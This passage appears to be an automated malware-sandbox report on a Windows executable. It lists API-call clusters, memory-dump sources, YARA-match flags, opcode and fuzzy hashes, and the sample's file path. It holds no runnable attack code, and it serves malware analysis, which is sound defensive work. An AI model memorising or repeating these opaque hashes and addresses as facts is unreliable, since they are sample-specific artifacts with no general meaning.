                                                    • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                    APIs
                                                      • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                      • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                    • GetLastError.KERNEL32 ref: 00415AB1
                                                    • __dosmaperr.LIBCMT ref: 00415AB8
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                    • __dosmaperr.LIBCMT ref: 00415AFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                    • String ID:
                                                    • API String ID: 167067550-0
                                                    • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                    • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                    • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                    • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                    • Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
                                                    • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                    • Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4
                                                    APIs
                                                    • GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
                                                    • _free.LIBCMT ref: 04B514C6
                                                    • _free.LIBCMT ref: 04B514FC
                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                    • Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
                                                    • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                    • Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                    • _free.LIBCMT ref: 10006EFE
                                                    • _free.LIBCMT ref: 10006F34
                                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                    • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                    • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                    • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                    APIs
                                                    • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,771ADF80,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 00411202
                                                    • _free.LIBCMT ref: 0041125F
                                                    • _free.LIBCMT ref: 00411295
                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,771ADF80,00000000,00000000,00401ED8), ref: 004112A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                    • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                    • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                    • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
                                                    • _free.LIBCMT ref: 04B5161D
                                                    • _free.LIBCMT ref: 04B51653
                                                    • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                    • Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
                                                    • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                    • Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                    • _free.LIBCMT ref: 10007055
                                                    • _free.LIBCMT ref: 1000708B
                                                    • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                    • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                    • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                    • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                    • _free.LIBCMT ref: 004113B6
                                                    • _free.LIBCMT ref: 004113EC
                                                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 2283115069-0
                                                    • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                    • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                    • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                    • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                    • Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
                                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                    • Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8
                                                    APIs
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CEA1C0
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CEA1D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Value___vcrt_
                                                    • String ID:
                                                    • API String ID: 1426506684-0
                                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction ID: d8cf10429ad78adbbf649e9e716cdc821bb75004371922dd5f56d618f8819c6d
                                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                                    • Instruction Fuzzy Hash: DD01D4323092119FA7342F77BC859772B56EB056B9730023AE914650E1FF1B7D126154
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
                                                    • GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC
                                                      • Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082
                                                    • ___initconout.LIBCMT ref: 04B5B0BC
                                                      • Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047
                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                    • Instruction ID: 54ca15ac29abb2cc356db3baf26df87052cd03596aeb9704bf31b045e8cf73b7
                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                    • Instruction Fuzzy Hash: EFF03036901114BFCF226FA1DC08ADDBF26FF086A4F094460FE1E96130C632A961DB95
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                    • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                      • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                    • ___initconout.LIBCMT ref: 1000CD55
                                                      • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                    • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                    • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                    • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                    • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                      • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                    • ___initconout.LIBCMT ref: 0041AE55
                                                      • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                    • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                    • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                    • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                    • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                    • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID:
                                                    • API String ID: 3269011525-0
                                                    • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                    • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                    • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                    • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                    • Instruction ID: a52cc2ab89454d24c6d9fecf1b2cf4ea9ab31382e6dc5c5c8b4052db5e01ed63
                                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                    • Instruction Fuzzy Hash: 81E0EC71B133209A96726F15BD4044AFF62EBD4F143C5803AE54012332C77A2953EBCE
                                                    APIs
                                                    • _free.LIBCMT ref: 04B50CB6
                                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                    • _free.LIBCMT ref: 04B50CC9
                                                    • _free.LIBCMT ref: 04B50CDA
                                                    • _free.LIBCMT ref: 04B50CEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                    • Instruction ID: 2a638163b3dbc4a5c9aadf3cbc1385501b8d40215370a85339a438bd3f7c2bfd
                                                    • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                    • Instruction Fuzzy Hash: 52E0EC79E13334AAD6366F18BD40649FF69EBD8B143C50076E83012270C7322553ABCE
                                                    APIs
                                                    • _free.LIBCMT ref: 100067F1
                                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                    • _free.LIBCMT ref: 10006804
                                                    • _free.LIBCMT ref: 10006815
                                                    • _free.LIBCMT ref: 10006826
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                    • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                    • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                    • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                    APIs
                                                    • _free.LIBCMT ref: 00410A4F
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    • _free.LIBCMT ref: 00410A62
                                                    • _free.LIBCMT ref: 00410A73
                                                    • _free.LIBCMT ref: 00410A84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                    • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                    • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                    • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                    • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                    • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                    • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                    • API String ID: 0-2708042248
                                                    • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                    • Instruction ID: a738876d3c2ff8ac166625f641da9be7d3e0f88f925c14354a04c58037eea498
                                                    • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                    • Instruction Fuzzy Hash: 6D416671A00218AFDB21EF9DDC81AAEFBB8EFC5314B5000A6E805D7261E770AA41DB54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                    • API String ID: 0-2708042248
                                                    • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                    • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                    • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
